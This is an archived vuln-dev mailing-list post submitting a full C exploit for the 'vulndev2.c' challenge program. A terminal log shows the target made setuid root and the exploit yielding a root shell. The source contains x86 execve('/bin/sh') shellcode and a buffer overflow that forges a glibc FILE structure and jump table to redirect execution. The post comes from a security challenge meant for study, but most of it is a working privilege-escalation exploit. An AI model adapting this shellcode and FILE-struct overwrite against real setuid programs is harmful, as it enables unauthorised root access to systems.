Re: [Vuln-dev Challenge] Challenge #2

["D." <dugely () yahoo com>]

Hello vuln-dev!

Attached is an exploit for vulndev2.c, or you can
download it here:

http://www.hcsw.org/sploits/vulndev2sploit.c

This was a fun challenge and I hope there are lots of
interesting posts about it as well as many more
interesting challenges in the future!

Doug Hoyte
Hypervivid Solutions, Inc

__________________________________
Do you Yahoo!?
The New Yahoo! Search - Faster. Easier. Bingo.
http://search.yahoo.com

/*

  vulndev2.c exploit - (C) 2003 Doug Hoyte and Hypervivid Solutions, Inc

  www.hypervivid.com
  www.hcsw.org
  fractal@efnet



doug@saturn:~/devel/vulndev$ uname -mnrsp
Linux saturn 2.4.19 i686 unknown
doug@saturn:~/devel/vulndev$ gcc -Wall -g -o vulndev2sploit vulndev2sploit.c
doug@saturn:~/devel/vulndev$ gcc -Wall -g -o vulndev2 vulndev2.c
doug@saturn:~/devel/vulndev$ su
Password:
root@saturn:/home/doug/devel/vulndev# chown root vulndev2
root@saturn:/home/doug/devel/vulndev# chgrp root vulndev2
root@saturn:/home/doug/devel/vulndev# chmod a+rxs vulndev2
root@saturn:/home/doug/devel/vulndev# exit
doug@saturn:~/devel/vulndev$ ls -al vulndev2
-rwsr-sr-x    1 root     root        18373 May 24 04:16 vulndev2
doug@saturn:~/devel/vulndev$ ./vulndev2sploit ./vulndev2 bffff86c

[*] vulndev2.c sploit by Doug Hoyte: www.hypervivid.com

[*] Using offset bffff86c

[*] Removing old log file 'db.log'

[*] Sploiting...

;;Ìøÿ¿;;
sh-2.05a# whoami
root
sh-2.05a# exit
doug@saturn:~/devel/vulndev$



*/



#include <unistd.h>
#include <ctype.h>
#include <stdio.h>



/* my strtok's, well... don't ask */
int my_hatoi(char *tp) {
  int t=0;
  char tc;

  if (tp[0]=='0' && tp[1]=='x') tp+=2;
  while(isxdigit(tc = tolower(*tp))) {
    if (isdigit(tc)) t = (t<<4) + (tc - '0');
    else t = (t<<4) + (tc - 'a' + 10);
    tp++;
  }

  return t;
}



int main (int argc, char *argv[]) {

  // shellcode for Linux/x86 by Aleph Null
  char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  char sploit1[2000];
  char sploit2[100];
  int i, ADDR_OF_BUF, *tp;

  printf("\n[*] vulndev2.c sploit by Doug Hoyte: www.hypervivid.com\n\n");

  if (argc != 3) {
    printf("       Usage: %s <path to vulndev2> <offset>\n", argv[0]);
    printf("       Offset should be the location in memory of the 'buf' variable\n\n");
    return 0;
  }

  ADDR_OF_BUF = my_hatoi(argv[2]);
  printf("[*] Using offset %x\n\n", ADDR_OF_BUF);

  /* Remove the old log file */
  printf("[*] Removing old log file 'db.log'\n\n");
  unlink("db.log");

  // Everything to 'a's
  memset(sploit1, 'a', sizeof(sploit1));

  // Set BFP to point 2 bytes before F1 (so those damn semi-colons don't get in the way)
  *((int*)(sploit1+92)) = ADDR_OF_BUF-4-2;


  // The magic number for FILE structs on glibc is 0xfBAD! Dig?
  tp = (int*) (sploit1+96);
  tp[0] = 0xFBAD0101;

  // The FILE struct BS, we don't really care: we just want the ...
  for(i=1;i<40;i++) tp[i] = (int) (ADDR_OF_BUF+96+(40*4));

  // ... jump table
  for(i=40;i<48;i++) tp[i] = (int) (ADDR_OF_BUF+96+(40*4)+(8*4));


  // Tag the shell code on at the end
  memcpy(sploit1+96+(40*4)+(8*4), shellcode, sizeof(shellcode));

  // Use arg #2 to point F1 to our FILE struct
  memset(sploit2, '\0', sizeof(sploit2));
  *((int*)sploit2) = ADDR_OF_BUF+96;

  // There's a bad moon on the rise...
  printf("[*] Sploiting...\n\n");
  execl(argv[1], argv[1], sploit1, sploit2, NULL);

  return 0;

}